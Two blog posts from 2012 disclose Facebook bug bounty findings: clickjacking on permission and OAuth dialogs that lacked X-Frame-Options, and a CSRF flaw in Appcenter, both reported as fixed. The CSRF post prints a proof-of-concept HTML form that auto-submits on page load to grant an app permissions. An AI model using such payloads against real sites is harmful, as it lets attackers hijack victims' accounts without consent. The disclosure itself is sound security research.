Tuesday, 21 August 2012

No XFO? It's time for Facebook Clickjacking

This post is the summary of the clickjacking bugs I reported for Facebook bug bounty program. All these bugs discussed here are now fixed. Attacker was able to add any malicious facebook app with any permissions to victims account just by one click. Vulnerable pages discussed below were lacking Anti-Clickjacking Protection such as X-Frame-Options header which renders the vulnerable page in iframe (invisible).

First bug I found was in permissions.request dialog on Facebook Mobile site. This dialog was used to add Facebook apps to authenticated user. A single click on "Allow" button would add the app to victim facebook profile.

The vulnerable link, which adds "Graph API Explorer" app, was:


Here "display" parameter was used to decide the apperance of the page based on values supplied. It has 3 values: page, wap & touch. Page display was mainly used in Facebook main site and wap & touch was for Facebook mobile site.

The next bug was the variation of the previous bug where the permissions.request dialog page was able to render in iframe with "display=wap" parameter. With this parameter, the page looks like Mobile facebook page in Facebook main site which was lacking the clickjakcing protection at that time. The vulnerable page for this was:


Till this I learned new things about these dialogs and was able to add any permissions to the app.

The last bug was about oauth dialog. This was again from Facebook Mobile site. The vulnerable page was:


Sadly this bug didn't win any bounty as Facebook said "This can't be protected with X-Frame-Options because it needs to be servable in an arbitrary iframe.".

Well, I developed my own process to find such bugs which helps me to identify them quickly.

All of these bugs will result in adding malicious app with unwanted permissions to victim's account only with single user click. These permissions includes access to email, status message and many other things.

Here is a small demonstration:

That's all. Hope you like this post. Suggessions, comments are welcome.

Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook I recently reported & now fixed. One fine day, when I logged into Facebook, I noticed a new feature "Appcenter". This feature allows you to choose apps you need. Game apps like Farmvilla are more popular.

I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked "Play Game" button, was generating a POST request.


POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800


There are many new parameters added in this new feature. Parameter 'fb_dtsg' is like token and 'perm' are the permissions required by the apps. Parameters 'redirect_url','app_id' are app specific values. Remaining parameters seems static except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and after few attempts, I knew that these params no longer needed to add an app. 

Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

Final PoC for this CSRF looks like this:

<body onload=document.forms[0].submit();>
<form action="https://www.facebook.com/connect/uiserver.php" method="POST">
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value=1 />
        <input type="hidden" name="new_user_session" value=1 />
        <input type="hidden" name="grant_clicked" value=1 />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" />
        <input type="hidden" name="app_center" value=1 />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value=1 />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <input type="hidden" name="grant_clicked" value="Play+Game" />

This functionality was used for other apps as well such as music apps, developers apps. Facebook Security team awarded this bug with $5000.

Facebook was pretty fast to address this issue and resolved this the next day itself. I'm very thankful to Facebook Security Team.